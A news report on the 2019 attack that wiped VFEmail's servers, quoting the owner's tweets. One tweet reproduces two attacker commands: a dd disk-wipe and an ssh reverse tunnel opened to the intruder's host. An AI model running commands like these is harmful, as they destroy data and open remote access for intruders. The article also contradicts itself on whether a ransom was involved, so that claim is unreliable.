“The hackers did not leave a ransom note and, given the extent of the destruction, the service will most likely go offline to never return.”
In a tweet and statement, VFEmail’s owner confirmed that the attack ‘likely’ constitutes a death knell for the service:
Yes, @VFEmail is effectively gone. It will likely not return.
I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.
— Havokmon (@Havokmon) February 12, 2019
“I’m leaning towards not rebuilding. There was a lot of custom code that would need to be re-written, and it was never profitable. VFEmail didn’t make money on selling personal data or targeted ads. Even Adsense revenue had all but dried up.”
“This is not looking good. All externally facing systems, of differing OS’s and remote authentication, in multiple data centers are down.”
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
Within two hours tweeting that they were watching hackers destroy their systems, VFEmail announced on Twitter that hackers had managed to format all disks on all servers, and had effectively erased all the virtual mail hosted on the service.
VFEmail is reportedly not the first email service provider to be attacked in this way, but it appears to be the first ransomed for it.
VFEmail’s owner could only speculate as to the reasons behind the hack:
“I don’t know why this level of attack was executed. I wouldn’t say I have no idea why, but I hear rumblings of hackers using it, political dissidents, privacy advocates, sex traffickers, etc.. Anyone of those people could want data removed.”